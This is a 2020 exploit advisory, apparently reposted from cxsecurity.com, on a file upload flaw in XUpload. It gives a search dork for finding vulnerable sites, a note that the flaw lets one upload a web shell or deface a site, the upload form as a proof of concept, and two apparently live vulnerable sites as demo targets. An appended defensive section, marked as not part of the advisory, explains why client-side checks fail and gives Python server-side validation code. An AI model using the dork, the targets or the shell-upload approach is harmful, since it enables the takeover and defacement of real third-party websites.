XUpload Remote File Upload Vulnerability
2020-11-05 06:49:07 Author: cxsecurity.com

# Title: XUpload Remote File Upload Vulnerability
# Author: h4shur
# date: 2020-11-04
# Tested on: Windows 10 & Google Chrome
# Category : Web Application Bugs
# Dork : intext:"Powered by XUpload"

### NOTE:
* You can bypass it to upload your shell or deface.

### POC:
* Exploit 1 : site.com/[folder]/[file]

<form enctype="multipart/form-data" action="/cgi-bin/upload.cgi?upload_id=" method="post" onSubmit="return StartUpload(this);" target="xupload">
Send file: <input name="file_1" type="file" onChange="checkExt(this.value)"><br>
Comment: <input type="text" name="comment">(optional) <br><br>
<Input type="checkbox" name="popup"><label FOR="popup" ACCESSKEY="Z">Show upload status in pop-up window</label><br>
<br>
<input type="submit" value="Upload File">
</form>

### Demo:
* http://www.satyrlp.sorokine.fr
* http://50.116.78.206/uploadtest/upload_form.html

### Contact Me :
* Telegram : @h4shur
* Email : [email protected]
* Instagram : @netedit0r
* twitter : @h4shur
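
The form in the POC attaches a browser-side handler, checkExt(this.value), to the file_1 field; a check that runs only in the browser does not bind a client that posts to the upload endpoint directly, so the file type has to be enforced on the server. The following is an added example, not XUpload's code and not part of the advisory: a server-side validation routine in Python, where the allowlist, the size limit and all function names are assumptions made for illustration.

```python
import os
import secrets

# Assumed policy for this sketch (not from the advisory): images and PDFs only,
# each mapped to the magic bytes its content must start with.
ALLOWED = {
    ".png": b"\x89PNG\r\n\x1a\n",
    ".jpg": b"\xff\xd8\xff",
    ".gif": b"GIF8",
    ".pdf": b"%PDF-",
}
# Inner extensions a permissive handler mapping could still execute,
# e.g. "report.php.jpg".
EXECUTABLE = {".php", ".phtml", ".cgi", ".pl", ".py", ".asp", ".aspx", ".jsp", ".sh"}
MAX_BYTES = 5 * 1024 * 1024  # assumed size limit


class UploadRejected(ValueError):
    """Raised when an upload fails a server-side check."""


def validate_upload(client_filename: str, data: bytes) -> str:
    """Check one uploaded file (the form's file_1 field); return a storage name."""
    if len(data) > MAX_BYTES:
        raise UploadRejected("file too large")
    # Discard any client-supplied directory part, including Windows backslashes.
    name = os.path.basename(client_filename.replace("\\", "/")).strip().lower()
    if not name or "\x00" in name:
        raise UploadRejected("bad file name")
    parts = name.split(".")
    ext = "." + parts[-1] if len(parts) > 1 else ""
    if ext not in ALLOWED:
        raise UploadRejected("extension not on the allowlist")
    if any("." + p in EXECUTABLE for p in parts[1:-1]):
        raise UploadRejected("executable extension inside the name")
    if not data.startswith(ALLOWED[ext]):
        raise UploadRejected("content does not match the extension")
    # Never store under the client's name: a random name removes path tricks
    # and makes the stored location unguessable.
    return secrets.token_hex(16) + ext


def is_accepted(client_filename: str, data: bytes) -> bool:
    try:
        validate_upload(client_filename, data)
        return True
    except UploadRejected:
        return False
```

Storing accepted files outside the web root, or in a directory where the server is configured never to execute scripts, complements these checks.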


Source: https://cxsecurity.com/issue/WLB-2020110020